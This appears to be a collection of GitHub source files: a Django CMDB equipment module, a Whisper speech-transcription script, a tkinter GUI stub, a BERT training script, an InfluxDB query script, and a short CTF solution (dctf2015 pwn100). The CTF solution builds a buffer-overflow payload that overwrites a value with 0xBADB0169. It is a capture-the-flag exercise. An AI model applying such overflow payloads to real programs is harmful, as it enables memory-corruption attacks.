id_list.append(e.get(\"id\", 0))\n return list(set(id_list))\n\n\n@operator_audit_decorator(\"EquipmentBoardCard\")\ndef post_boardcard(post_data, user):\n \"\"\"\n 添加,修改,删除网络设备板卡信息\n :param post_data:\n :return:\n \"\"\"\n result = response_format()\n try:\n action = post_data.get(\"action\")\n values = post_data.get(\"value\")\n custid = post_data.get(\"custid\")\n values = common.filter_dict(values)\n if action == \"new\":\n if \"ports\" in values.keys():\n ports = values.pop(\"ports\")\n else:\n ports = \"\"\n # 更新id、assetno等信息\n values.update(dict(id=base.nextid(models.EquipmentBoardCard._meta.db_table, custid),\n assetno=common.create_assno(),\n createuser=user.username, updateuser=user.username))\n # 创建板卡信息\n boardcard = models.EquipmentBoardCard.objects.create(**values)\n # 插入端口到端口表\n if ports:\n portlist = ports.split(\",\")\n portlist.sort()\n for port in portlist:\n if port:\n port_obj = models.PortList.objects.create(\n **dict(id=base.nextid(models.PortList._meta.db_table, custid),\n object_pk=boardcard.id,\n portname=port,\n flag=2))\n new_card_info = dict(id=boardcard.id, assetno=boardcard.assetno, sn=boardcard.sn, model=boardcard.model,\n cardname=boardcard.cardname, slot=boardcard.slot, remark=boardcard.remark)\n # 返回卡端口及映射信息\n new_card_info.update(_equipment_port_list(boardcard))\n result[\"info\"] = \"添加成功\"\n result[\"data\"] = new_card_info\n\n if action == \"edit\":\n cid = values.get(\"id\", 0)\n if not cid:\n result[\"info\"] = \"参数错误\"\n result[\"category\"] = \"error\"\n result[\"status\"] = False\n return result\n else:\n card_obj = models.EquipmentBoardCard.objects.filter(id=cid)\n card_obj.update(**values)\n result[\"info\"] = \"修改成功\"\n\n if action == \"delete\":\n cid = values.get(\"id\", 0)\n # 获取板卡对象\n card_obj = models.EquipmentBoardCard.objects.filter(id=cid).first()\n # 删除板卡对应的所有端口,同时关联的所有映射表也同时删除\n models.PortList.objects.filter(object_pk=card_obj.id, flag=2).delete()\n # 删除卡记录\n card_obj.delete()\n result[\"info\"] = \"删除成功\"\n except Exception as e:\n logger.error(e)\n result[\"info\"] = \"系统错误\"\n result[\"category\"] = \"error\"\n return result\n\n\ndef get_port_map_info(request_data, custid):\n \"\"\"\n 根据请求的设备类型,返回端口信息,模糊搜索对应设备\n :param request_data: {\"porttype\":1, \"condition\":\"xxxxxx\"}\n :return:\n \"\"\"\n target_port_list = list()\n try:\n card_dict_list = dict()\n porttype = int(request_data.get(\"porttype\", 2))\n condition = request_data.get(\"condition\", \"\")\n if porttype == 1:\n # 
主机设备,获取模糊搜索条件的设备下的所有板卡信息\n servers_obj = models.Servers.objects.filter(hostname__contains=condition, cust_id=custid)\n for serv in servers_obj:\n serv_card_obj = serv.related_card.select_related()\n for card in serv_card_obj:\n card_dict_list.update({card.id: \"{0}:{1}\".format(serv.hostname,\n \"网卡\" if card.cardtype == 1 else \"存储卡\")})\n if porttype == 2:\n # 网络设备端口\n equipment_obj = models.Equipment.objects.filter(\n Q(sn__contains=condition) | Q(assetname__contains=condition), cust_id=custid)\n for equipment in equipment_obj:\n ecard_obj = equipment.related_card.select_related()\n for card in ecard_obj:\n card_dict_list.update({card.id: \"{0}:{1}({2})\".format(equipment.assetname,\n equipment.model,\n card.cardname)})\n # 获取已经建立匹配的端口ID\n mapped_id = list()\n all_map_rec = models.PortMapping.objects.all().values(\"localport_id\", \"targetport_id\")\n for rec in all_map_rec:\n mapped_id.append(rec.get(\"localport_id\"))\n mapped_id.append(rec.get(\"targetport_id\"))\n\n # 获取端口信息\n port_list = models.PortList.objects.filter(flag=porttype, object_pk__in=list(card_dict_list.keys()),\n ).exclude(id__in=mapped_id)\n for port in port_list:\n target_port_list.append(dict(id=port.id, portname=port.portname,\n portasset=card_dict_list.get(port.object_pk, \"\"),\n porttype=port.porttype))\n\n except Exception as e:\n logger.error(e)\n\n return target_port_list\n\n\n@operator_audit_decorator(\"PortMapping\")\ndef post_port_map_info(request_data):\n \"\"\"\n 添加、编辑、删除端口映射信息,提交的数据包括:板卡ID,端口名\n :param request_data: {\"value\":{\"portname\":\"E1/0\",\"card_id\":10011,\"targetport_id\":10012,\"remark\":\"xxx\"},\n \"action\":\"edit/new/delete\",\n }\n :return:\n \"\"\"\n result = response_format()\n try:\n # 获取端口对应的ID\n post_data = request_data.get(\"value\", {})\n action = request_data.get(\"action\", \"\")\n custid = request_data.get(\"custid\")\n if not post_data or not action:\n result[\"info\"] = \"参数错误\"\n result[\"category\"] = \"error\"\n result[\"status\"] = False\n else:\n if action == \"delete\":\n models.PortMapping.objects.filter(id=int(post_data.get(\"id\"))).delete()\n result[\"info\"] = \"删除成功\"\n else:\n # 获取端口ID\n local_port = models.PortList.objects.filter(object_pk=int(post_data.get(\"card_id\", 0)),\n portname=post_data.get(\"portname\").strip(),\n flag=2).first()\n if not local_port:\n result[\"info\"] = \"未找到指定端口\"\n result[\"status\"] = False\n else:\n if action == \"new\":\n # 查找本地端口或对端端口是否已经存在映射\n check_port_id = [local_port.id, int(post_data.get(\"targetport_id\", 0))]\n mapped_obj = models.PortMapping.objects.filter(Q(localport_id__in=check_port_id) |\n Q(targetport_id__in=check_port_id),\n id__startswith=custid\n )\n if mapped_obj.count() > 0:\n # 本端或对端端口已经有映射关系\n result[\"info\"] = \"指定端口已建立映射关系\"\n result[\"category\"] = \"warning\"\n result[\"status\"] = True\n else:\n new_obj = models.PortMapping.objects.create(\n **dict(id=base.nextid(models.PortMapping._meta.db_table, custid),\n localport_id=local_port.id,\n targetport_id=int(post_data.get(\"targetport_id\", 0)),\n remark=post_data.get(\"remark\", \"\"))\n )\n result[\"info\"] = \"添加成功\"\n result[\"data\"] = dict(mapid=new_obj.id, id=new_obj.id, localport_id=new_obj.localport_id,\n targetport_id=new_obj.targetport_id)\n\n if action == \"edit\":\n edit_data = dict(id=post_data.get(\"id\"), localport_id=local_port.id,\n targetport_id=int(post_data.get(\"targetport_id\", 0)),\n remark=post_data.get(\"remark\", \"\"))\n models.PortMapping.objects.filter(id=int(post_data.get(\"id\"))).update(**edit_data)\n\n 
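`get_port_map_info` above gathers the ids of already-mapped ports by looping over `.values(...)` dicts and appending both ends of every mapping. `values_list` plus `itertools.chain` does the same flattening in two lines, and a `set` also speeds up the later `exclude(id__in=...)`; a sketch against the same models:

```python
from itertools import chain

# pairs of (localport_id, targetport_id) straight from the ORM;
# `models` as imported in the module above
pairs = models.PortMapping.objects.values_list("localport_id", "targetport_id")
mapped_id = set(chain.from_iterable(pairs))
# port_list = models.PortList.objects.filter(...).exclude(id__in=mapped_id)
```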
result[\"info\"] = \"修改成功\"\n\n except Exception as e:\n logger.error(e)\n result[\"info\"] = \"执行错误\"\n result[\"status\"] = False\n print(result)\n return result\n\n\n# @operator_audit_decorator(\"Equipment\")\n# def import_excel(request_data, excel_data):\n# \"\"\"\n# 导入Excel文件到数据库\n# :param excel_data:\n# :param request_data:\n# :return:\n# \"\"\"\n# save_record = list()\n# fail_record = list()\n# import_result = response_format()\n# custid = request_data.get(\"custid\")\n# print(excel_data)\n# try:\n# base_table = [('BaseEquipmentType', ['name', 'id']), ('BaseDataCenter', ['name', 'id']),\n# ('BaseMachineRoom', ['name', 'id']), ('Staffs', ['name', 'id']),\n# ('BaseAssetStatus', ['status', 'id']), ('BaseNetArea', ['name', 'id']),\n# ('BaseFactory', ['name', 'id'])\n# ]\n# # 导入数据中的下拉框值对应的ID字典\n# base_table_id_dict = base.convert_table_field(base_table, 0, 1, custid)\n#\n# # 获取当前asset表中的已存在所有sn与管理IP\n# list_asset_info = base.load_base_table_record(\"Equipment\", [\"sn\", \"manageip\"], custid)\n# sn_list = list(set([obj.get('sn') for obj in list_asset_info.get(\"equipment\")]))\n# if sn_list.count('') > 0:\n# sn_list.remove('')\n# ip_list = list(set([obj.get('manageip') for obj in list_asset_info.get(\"equipment\")]))\n# if ip_list.count('') > 0:\n# ip_list.remove('')\n#\n# # 开始导入数据\n# for obj in excel_data:\n# assets_obj_info = dict(assetname=obj[0], usetype=obj[1],\n# assettype_id=base_table_id_dict['baseequipmenttype'].get(obj[2], None),\n# room_id=base_table_id_dict['basemachineroom'].get(obj[4], None),\n# cabinet=int(obj[5]) if isinstance(obj[5], float) else obj[5],\n# manageip=obj[6],\n# slotindex=int(obj[7]) if isinstance(obj[7], float) else obj[7],\n# model=obj[8],\n# sn=int(obj[9]) if isinstance(obj[9], float) else obj[9],\n# powertype=obj[10],\n# factory_id=base_table_id_dict['basefactory'].get(obj[11], None),\n# netarea_id=base_table_id_dict['basenetarea'].get(obj[12], None),\n# tradedate=obj[13] if obj[13] else None,\n# expiredate=obj[14] if obj[14] else None,\n# status_id=base_table_id_dict[\"baseassetstatus\"].get(obj[15], None),\n# remark=obj[16],\n# id=base.nextid(models.Equipment._meta.db_table, custid),\n# updateuser=request_data.get(\"user\").username,\n# createuser=request_data.get(\"user\").username,\n# # createuser='cmdb', updateuser='cmdb',\n# cust_id=custid, assetno=common.create_assno()\n# )\n# # 开始校验数据\n# # sn, manageip\n# err_msg = \"\"\n# if not assets_obj_info.get(\"assetname\"):\n# err_msg = \"{0}| 设备名称不能为空 \".format(err_msg)\n#\n# if assets_obj_info.get('sn') in sn_list:\n# err_msg = \"{0}| 序列号 {1} 已存在 \".format(err_msg, assets_obj_info.get(\"sn\"))\n#\n# if assets_obj_info.get('manageip') in ip_list:\n# err_msg = \"{0}| 管理IP {1} 已存在 \".format(err_msg, assets_obj_info.get(\"manageip\"))\n# if not assets_obj_info.get('model'):\n# err_msg = \"{0}| 设备型号不能为空 \".format(err_msg)\n#\n# if err_msg:\n# fail_record.append({\"row\": excel_data.index(obj) + 1, \"errmsg\": err_msg.strip()[1:]})\n# continue\n# else:\n# if assets_obj_info.get('sn'):\n# sn_list.append(assets_obj_info.get('sn'))\n# if assets_obj_info.get('manageip'):\n# ip_list.append(assets_obj_info.get('manageip'))\n#\n# # 校验没问题就加入到要创建的列表中\n# # save_record.append(models.Equipment(**assets_obj_info))\n#\n# # 将对象批量写入库\n# # models.Equipment.objects.bulk_create(save_record)\n# import_result[\"info\"] = \"导入完成!执行{0}条 成功{1}条, 失败{2}条.\".format(len(excel_data), len(save_record),\n# len(fail_record))\n# import_result[\"data\"] = fail_record\n# import_result[\"status\"] = False if len(fail_record) > 0 else 
True\n#\n# except Exception as e:\n# logger.error(e)\n# import_result[\"info\"] = \"导入错误!\"\n#\n# return import_result\n\ndef import_excel(request_data, excel_data):\n \"\"\"\n 针对太原银行导入Excel文件到数据库\n :param excel_data:\n :param request_data:\n :return:\n \"\"\"\n save_record = list()\n fail_record = list()\n import_result = response_format()\n custid = request_data.get(\"custid\")\n print(excel_data)\n try:\n base_table = [('BaseEquipmentType', ['name', 'id']), ('BaseDataCenter', ['name', 'id']),\n ('BaseMachineRoom', ['name', 'id']), ('Staffs', ['name', 'id']),\n ('BaseAssetStatus', ['status', 'id']), ('BaseNetArea', ['name', 'id']),\n ('BaseFactory', ['name', 'id'])\n ]\n # 导入数据中的下拉框值对应的ID字典\n base_table_id_dict = base.convert_table_field(base_table, 0, 1, custid)\n # 获取自定义扩展字段信息\n extend_field = common.list_to_dict(common.get_table_extend_fields(custid, \"Equipment\"), 'label', 'to_field')\n\n # 获取当前asset表中的已存在所有sn与管理IP\n list_asset_info = base.load_base_table_record(\"Equipment\", [\"sn\", \"manageip\"], custid)\n sn_list = list(set([obj.get('sn') for obj in list_asset_info.get(\"equipment\")]))\n if sn_list.count('') > 0:\n sn_list.remove('')\n ip_list = list(set([obj.get('manageip') for obj in list_asset_info.get(\"equipment\")]))\n if ip_list.count('') > 0:\n ip_list.remove('')\n\n # 开始导入数据\n for obj in excel_data:\n assets_obj_info = dict(\n customer001=obj[1], customer002=obj[2], manageip=obj[3], customer003=obj[4],\n customer004=obj[6], room_id=base_table_id_dict['basemachineroom'].get(obj[7], None),\n assettype_id=base_table_id_dict['baseequipmenttype'].get(obj[8], None),\n customer005=obj[9], customer006=obj[10], customer007=obj[11],\n customer008=obj[12], customer009=obj[13], customer016=obj[14], customer010=obj[15],\n usetype=obj[16], cabinet=int(obj[17]) if isinstance(obj[17], float) else obj[17],\n slotindex=int(obj[18]) if isinstance(obj[18], float) else obj[18],\n customer011=obj[19], customer012=obj[20],\n netarea_id=base_table_id_dict['basenetarea'].get(obj[21], None),\n tradedate=obj[22] if obj[22] else None,\n expiredate=obj[23] if obj[23] else None,\n provider_id=base_table_id_dict['basefactory'].get(obj[24], None),\n serviceprovider_id=base_table_id_dict['basefactory'].get(obj[25], None),\n status_id=base_table_id_dict[\"baseassetstatus\"].get(obj[26], None),\n customer013=obj[27],\n factory_id=base_table_id_dict['basefactory'].get(obj[28], None),\n model=obj[29],\n sn=int(obj[30]) if isinstance(obj[30], float) else obj[30],\n assetname=obj[31], customer015=obj[32],\n id=base.nextid(models.Equipment._meta.db_table, custid),\n updateuser=request_data.get(\"user\").username,\n createuser=request_data.get(\"user\").username,\n # createuser='cmdb', updateuser='cmdb',\n cust_id=custid, assetno=common.create_assno()\n )\n # 开始校验数据\n # sn, manageip\n err_msg = \"\"\n if not assets_obj_info.get(\"assetname\"):\n err_msg = \"{0}| 设备名称不能为空 \".format(err_msg)\n\n if assets_obj_info.get('sn') in sn_list:\n err_msg = \"{0}| 序列号 {1} 已存在 \".format(err_msg, assets_obj_info.get(\"sn\"))\n\n if assets_obj_info.get('manageip') in ip_list:\n err_msg = \"{0}| 管理IP {1} 已存在 \".format(err_msg, assets_obj_info.get(\"manageip\"))\n if not assets_obj_info.get('model'):\n err_msg = \"{0}| 设备型号不能为空 \".format(err_msg)\n\n if err_msg:\n fail_record.append({\"row\": excel_data.index(obj) + 1, \"errmsg\": err_msg.strip()[1:]})\n continue\n else:\n if assets_obj_info.get('sn'):\n sn_list.append(assets_obj_info.get('sn'))\n if assets_obj_info.get('manageip'):\n 
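The import loop above accumulates an error string per row and only keeps valid rows for `bulk_create`. Collecting the checks as (predicate, message) pairs keeps that validation declarative; a runnable sketch with the same rules and messages as the code above:

```python
def validate_row(info, sn_seen, ip_seen):
    """Return the list of error messages for one imported row."""
    checks = [
        (not info.get("assetname"),       "设备名称不能为空"),
        (info.get("sn") in sn_seen,       f"序列号 {info.get('sn')} 已存在"),
        (info.get("manageip") in ip_seen, f"管理IP {info.get('manageip')} 已存在"),
        (not info.get("model"),           "设备型号不能为空"),
    ]
    return [msg for failed, msg in checks if failed]

errors = validate_row({"assetname": "sw-1", "sn": "S1",
                       "manageip": "10.0.0.9", "model": ""},
                      sn_seen={"S1"}, ip_seen=set())
print(errors)  # ['序列号 S1 已存在', '设备型号不能为空']
```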
ip_list.append(assets_obj_info.get('manageip'))\n\n # 校验没问题就加入到要创建的列表中\n save_record.append(models.Equipment(**assets_obj_info))\n\n # 将对象批量写入库\n models.Equipment.objects.bulk_create(save_record)\n import_result[\"info\"] = \"导入完成!执行{0}条 成功{1}条, 失败{2}条.\".format(len(excel_data), len(save_record),\n len(fail_record))\n import_result[\"data\"] = fail_record\n import_result[\"status\"] = False if len(fail_record) > 0 else True\n\n except Exception as e:\n logger.error(e)\n import_result[\"info\"] = \"导入错误!\"\n\n return import_result\n","repo_name":"tonglinge/MyProjects","sub_path":"cmdb/afcat/cmdb/libs/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":52140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"40589708525","text":"import io\nfrom pydub import AudioSegment\nimport speech_recognition as sr\nimport whisper\nimport queue\nimport tempfile\nimport os\nimport threading\nimport click\nimport torch\nimport numpy as np\n\n@click.command()\n@click.option(\"--model\", default=\"base\", help=\"Model to use\", type=click.Choice([\"tiny\",\"base\", \"small\",\"medium\",\"large\"]))\n@click.option(\"--english\", default=False, help=\"Whether to use English model\",is_flag=True, type=bool)\n@click.option(\"--verbose\", default=False, help=\"Whether to print verbose output\", is_flag=True,type=bool)\n@click.option(\"--energy\", default=300, help=\"Energy level for mic to detect\", type=int)\n@click.option(\"--dynamic_energy\", default=False,is_flag=True, help=\"Flag to enable dynamic engergy\", type=bool)\n@click.option(\"--pause\", default=0.8, help=\"Pause time before entry ends\", type=float)\n@click.option(\"--save_file\",default=False, help=\"Flag to save file\", is_flag=True,type=bool)\ndef main(model, english,verbose, energy, pause,dynamic_energy,save_file):\n temp_dir = tempfile.mkdtemp() if save_file else None\n #there are no english models for large\n if model != \"large\" and english:\n model = model + \".en\"\n audio_model = whisper.load_model(model)\n audio_queue = queue.Queue()\n result_queue = queue.Queue()\n threading.Thread(target=record_audio,\n args=(audio_queue, energy, pause, dynamic_energy, save_file, temp_dir)).start()\n threading.Thread(target=transcribe_forever,\n args=(audio_queue, result_queue, audio_model, english, verbose, save_file)).start()\n\n while True:\n print(result_queue.get())\n\n\ndef record_audio(audio_queue, energy, pause, dynamic_energy, save_file, temp_dir):\n #load the speech recognizer and set the initial energy threshold and pause threshold\n r = sr.Recognizer()\n r.energy_threshold = energy\n r.pause_threshold = pause\n r.dynamic_energy_threshold = dynamic_energy\n\n with sr.Microphone(sample_rate=16000) as source:\n print(\"Say something!\")\n i = 0\n while True:\n #get and save audio to wav file\n audio = r.listen(source)\n if save_file:\n data = io.BytesIO(audio.get_wav_data())\n audio_clip = AudioSegment.from_file(data)\n filename = os.path.join(temp_dir, f\"temp{i}.wav\")\n audio_clip.export(filename, format=\"wav\")\n audio_data = filename\n else:\n torch_audio = torch.from_numpy(np.frombuffer(audio.get_raw_data(), np.int16).flatten().astype(np.float32) / 32768.0)\n audio_data = torch_audio\n\n audio_queue.put_nowait(audio_data)\n i += 1\n\n\ndef transcribe_forever(audio_queue, result_queue, audio_model, english, verbose, save_file):\n while True:\n audio_data = audio_queue.get()\n if english:\n result = audio_model.transcribe(audio_data,language='english')\n 
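In `record_audio` above (the Whisper mic script), raw 16-bit PCM from `speech_recognition` becomes the float32 tensor Whisper expects by reinterpreting the bytes as `int16` and scaling into [-1, 1] with a divide by 32768. The conversion in isolation, on synthetic samples:

```python
import numpy as np
import torch

raw = np.array([0, 16384, -32768, 32767], dtype=np.int16).tobytes()  # fake PCM

samples = np.frombuffer(raw, np.int16).flatten().astype(np.float32) / 32768.0
audio = torch.from_numpy(samples)
print(audio)  # tensor([ 0.0000,  0.5000, -1.0000,  1.0000])
```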
else:\n result = audio_model.transcribe(audio_data)\n\n if not verbose:\n predicted_text = result[\"text\"]\n result_queue.put_nowait(\"You said: \" + predicted_text)\n else:\n result_queue.put_nowait(result)\n\n if save_file:\n os.remove(audio_data)\n\n\nmain()","repo_name":"TeamDman/toolformer","sub_path":"backend/old/mic.py","file_name":"mic.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"95"} +{"seq_id":"14063158478","text":"import tkinter as tk\nfrom tkinter import filedialog, messagebox\n\n\nclass FileTransferGUI:\n def __init__(self, master):\n self.master = master\n master.title(\"File Transfer App\")\n self.folder_pairs = []\n \n self.source_label = tk.Label(master, text=\"Source Folders:\")\n self.source_label.grid(row=0, column=0)\n\n self.dest_label = tk.Label(master, text=\"Destination Folder:\")\n self.dest_label.grid(row=0, column=1)\n\n self.add_button = tk.Button(master, text=\"Add Folder Pair\", command=self.add_folder_pair)\n self.add_button.grid(row=0, column=2)\n\n self.move_button = tk.Button(master, text=\"Move Files\", command=self.move_files)\n self.move_button.grid(row=0, column=3)\n\n def add_folder_pair(self):\n source_folder = filedialog.askdirectory()\n if source_folder:\n dest_folder = filedialog.askdirectory()\n if dest_folder:\n file_extensions = filedialog.askstring(\"File Extensions\", \"Enter file extensions separated by comma: \")\n folder_pair = {\"source_folder\": source_folder, \"dest_folder\": dest_folder, \"file_extensions\": file_extensions}\n self.folder_pairs.append(folder_pair)\n row = len(self.folder_pairs) + 1\n source_var = tk.StringVar()\n source_var.set(source_folder)\n dest_var = tk.StringVar()\n dest_var.set(dest_folder)\n source_entry = tk.Entry(self.master, textvariable=source_var, state=tk.DISABLED)\n source_entry.grid(row=row, column=0)\n dest_entry = tk.Entry(self.master, textvariable=dest_var, state=tk.DISABLED)\n dest_entry.grid(row=row, column=1)\n check_var = tk.IntVar()\n check_button = tk.Checkbutton(self.master, variable=check_var)\n check_button.grid(row=row, column=2)\n self.folder_pairs[-1][\"source_var\"] = source_var\n self.folder_pairs[-1][\"dest_var\"] = dest_var\n self.folder_pairs[-1][\"check_var\"] = check_var\n self.folder_pairs[-1][\"source_entry\"] = source_entry\n self.folder_pairs[-1][\"dest_entry\"] = dest_entry\n self.folder_pairs[-1][\"check_button\"] = check_button\n\n def move_files(self):\n # Move files from source folders to destination folders\n pass\n\n","repo_name":"Theblackcat98/AutoTransferX","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"2257566167","text":"from transformers import AdamW, get_linear_schedule_with_warmup\nfrom sklearn.utils import shuffle\n\nfrom utils import *\nimport torch\nfrom BERT_BCE.CredDataset import *\nfrom BERT_BCE.CredClassifier import *\nfrom BERT_BCE.train import train_bert\n\nbert_model = \"albert-base-v2\" # 'albert-base-v2', 'albert-large-v2', 'albert-xlarge-v2', 'albert-xxlarge-v2', 'bert-base-uncased', ...\nfreeze_bert = False # if True, freeze the encoder weights and only update the classification layer weights\nmaxlen = 510 # maximum length of the tokenized input sentence pair : if greater than \"maxlen\", the input is truncated and else if smaller, the input is padded\nbs = 4 # batch size\niters_to_accumulate = 2 # the gradient 
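One fix worth flagging in `FileTransferGUI.add_folder_pair` above: `tkinter.filedialog` has no `askstring`, so that call raises `AttributeError` at runtime; the string prompt lives in `tkinter.simpledialog`. The corrected lines (to be used inside `add_folder_pair`, where a root window already exists):

```python
from tkinter import simpledialog

# replaces the filedialog.askstring(...) call in add_folder_pair:
file_extensions = simpledialog.askstring(
    "File Extensions", "Enter file extensions separated by comma: ")
```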
accumulation adds gradients over an effective batch of size : bs * iters_to_accumulate. If set to \"1\", you get the usual batch size\nlr = 2e-5 # learning rate\nepochs = 4 # number of training epochs\n\nset_seed(1)\nimport pandas as pd\n\ndf_train=shuffle(pd.read_csv(\"train.csv\",sep=';'))\ndf_test=shuffle(pd.read_csv(\"test.csv\",sep=';'))\n# Creating instances of training and validation set\nprint(\"Reading training data...\")\ntrain_set = CredDataset(df_train, maxlen, bert_model)\nprint(\"Reading validation data...\")\nval_set = CredDataset(df_test, maxlen, bert_model)\n# Creating instances of training and validation dataloaders\ntrain_loader = DataLoader(train_set, batch_size=bs, num_workers=5)\nval_loader = DataLoader(val_set, batch_size=bs, num_workers=5)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nnet = CredClassifier(bert_model, freeze_bert=freeze_bert)\n\nif torch.cuda.device_count() > 1: # if multiple GPUs\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\")\n net = nn.DataParallel(net)\n\nnet.to(device)\n\ncriterion = nn.CrossEntropyLoss()\nopti = AdamW(net.parameters(), lr=lr, weight_decay=1e-2)\nnum_warmup_steps = 0 # The number of steps for the warmup phase.\nnum_training_steps = epochs * len(train_loader) # The total number of training steps\nt_total = (len(train_loader) // iters_to_accumulate) * epochs # Necessary to take into account Gradient accumulation\nlr_scheduler = get_linear_schedule_with_warmup(optimizer=opti, num_warmup_steps=num_warmup_steps, num_training_steps=t_total)\n\ntrain_bert(net, criterion, opti, lr, lr_scheduler, train_loader, val_loader, epochs, iters_to_accumulate,device,bert_model)","repo_name":"HRishabh95/Credibility_Combined","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26845557023","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom influxdb import InfluxDBClient\r\n\r\nclient = InfluxDBClient(host='localhost', port=8086)\r\n\r\nclient.get_list_database()\r\nclient.switch_database('beverage')\r\n\r\n\r\nresult = client.query(\"\"\"select * from pet_sensor_readings where \"Day\" = '21' and \"Hour\" = '6' \"\"\")\r\nresult\r\nresult.raw\r\ne = next(iter(result))\r\n\r\ndf = pd.DataFrame(e)\r\ndf_1 = df.drop([\"Co2\", \"Month\", \"Year\", \"product\", \"Uday\"], axis=1)\r\n#client.query('select * from \"pet_sensor_readings\" where \"time\" = Now()-1d')\r\ndf_1.columns\r\nneworder = ['time','Preform','Blower', 'Plasmax','Filler', 'Date_coder','Labeller', 'PSP', 'Palletizer', 'Day', \"Week\",\"Hour\",]\r\ndf_1 = df_1.reindex(columns=neworder)\r\n\r\ndf_1['time'].head()\r\n\r\n# x=df_1[\"time\"].iloc[0:5013, ]\r\n# y=df_1[\"Preform\"].iloc[0:5013,]\r\n# y1=df_1[\"Blower\"].iloc[0:5013,]\r\n# y2=df_1[\"Plasmax\"].iloc[0:5013,]\r\n# y3=df_1[\"Filler\"].iloc[0:5013,]\r\n\r\n# plt.plot(x, y, marker = 'o', color='Black')\r\n# plt.plot(x, y1, marker = '', color='Blue')\r\n# plt.plot(x, y2, marker = '', color='Red')\r\n# plt.plot(x, y3, marker = '', color='Purple')\r\n# plt.show()\r\n\r\n# df_1[\"Preform\"].value_counts()\r\n\r\n# #points = result.get_points()\r\n# is_16 = df_1['Day']=='16'\r\n# day_16 = df_1[is_16]\r\n# is_6 = day_16['Hour']=='6'\r\n# day_166 = day_16[is_6]\r\n\r\n# cond1 = df_1['Day'] =='16'\r\n# cond2 = df_1['Hour'] =='6'\r\n# allcond = cond1 & cond2\r\n# df_1 = df_1[allcond]\r\n\r\n# df_1['Preform'].value_counts()\r\n# 
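The training setup above sizes the scheduler with `t_total = (len(train_loader) // iters_to_accumulate) * epochs` because the optimizer steps once per accumulated batch, giving an effective batch of `bs * iters_to_accumulate`. The repo's `train_bert` isn't shown here, but the accumulation pattern it presumably implements looks like this sketch (the batch tuple layout is an assumption, since `CredDataset` isn't shown either):

```python
# sketch of the gradient-accumulation loop train_bert presumably runs:
net.train()
opti.zero_grad()
for it, (seq, attn_mask, token_type_ids, labels) in enumerate(train_loader):
    logits = net(seq.to(device), attn_mask.to(device), token_type_ids.to(device))
    loss = criterion(logits, labels.to(device))
    (loss / iters_to_accumulate).backward()  # scale so accumulated grads average
    if (it + 1) % iters_to_accumulate == 0:  # effective batch = bs * iters_to_accumulate
        opti.step()                          # one optimizer step per effective batch
        lr_scheduler.step()                  # keep the scheduler in step with t_total
        opti.zero_grad()
```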
df_1['Blower'].value_counts()\r\n\r\n# #ss_day16 = client.query('select \"time\",\"Preform\",\"Blower\", \"Plasmax\",\"Filler\", \"Date_coder\",\"Labeller\", \"PSP\", \"Palletizer\" from \"pet_sensor_readings\" where \"Day\"= '16' ' )\r\n# #day_16 = next(iter(ss_day16)) \r\n\r\n# ss_day16.raw\r\n\r\n# df_1.head\r\n\r\n# #df.to_csv(\"L:\\pet_sensor_reading1.csv\")\r\n\r\n# #a = 1364797 \r\n# #b = 1048574\r\n# #print(a-b)\r\n\r\n# #df_subset = df.iloc[1048575:1364797, :]\r\n\r\n# df_1.to_csv(\"L:\\pet_day16.csv\")\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"upendradama/Predictive-Maintainance-for-Beverages","sub_path":"Automation/frominflux.py","file_name":"frominflux.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32449391869","text":"\na = [[[0, 0], [0.5, -1], [0.3, 0]], [[0.3, 0], [0.5, -1], [1.5, 1]], [[0.5, -1],\n[1.5, -0.2], [1.5, 1]], [[1.5, -0.2], [2, -0.5], [1.5, 1]], [[2, -0.5], [2, 0],\n[1.5, 1]], [[0.3, 0], [0.5, 1], [0, 0]]]\n\n\nl0=a[0]\ndic={'R':[l0[0]],'G':[l0[1]],'B':[l0[2]]}\nadd = list(map(lambda x:x, l0))\nflag = set()\nfor arr in range(1,len(a)):\n for subarr in a[arr]:\n for k,v in dic.items():\n if subarr in v:\n flag.add(k)\n for subarr in a[arr]:\n if subarr in add:\n continue\n else:\n if subarr not in dic['G'] and 'G' not in flag:\n add.append(subarr)\n dic['G'].append(subarr)\n flag.add('G')\n elif subarr not in dic['R'] and 'R' not in flag:\n add.append(subarr)\n dic['R'].append(subarr)\n flag.add('R')\n elif subarr not in dic['B'] and 'B' not in flag:\n add.append(subarr)\n dic['B'].append(subarr)\n flag.add('B')\n if len(flag) >= 3:\n flag=set()\ncolor=[]\nfor arr in a:\n line=[]\n for subarr in arr:\n for k,v in dic.items():\n if subarr in v:\n line.append(k)\n color.append(line)\nprint(dic)\nprint(add)\nprint()\nc = 0\nfor i in a:\n \n print(c, i, color[c])\n c += 1\n","repo_name":"fdetun/practice_algo","sub_path":"trianglecolorsbyfoued.py","file_name":"trianglecolorsbyfoued.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"ceb","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36181963291","text":"from struct import pack\n\nf = open(\"payload\", \"w\")\npayload = \"A\"*44 # buffer size\npayload+= \"B\"*8 # dummy\npayload+= pack(\"<L\", 0xBADB0169)\npayload+= \"\\x00\\x00\\x00\\x00\"\n\nf.write(payload)\nf.close()\n\n# (cat payload;cat)|./e100\n","repo_name":"myeonggyunhan/write-ups","sub_path":"2015/dctf2015/pwn100/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"70002820794","text":"from django.conf import settings\nfrom django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import 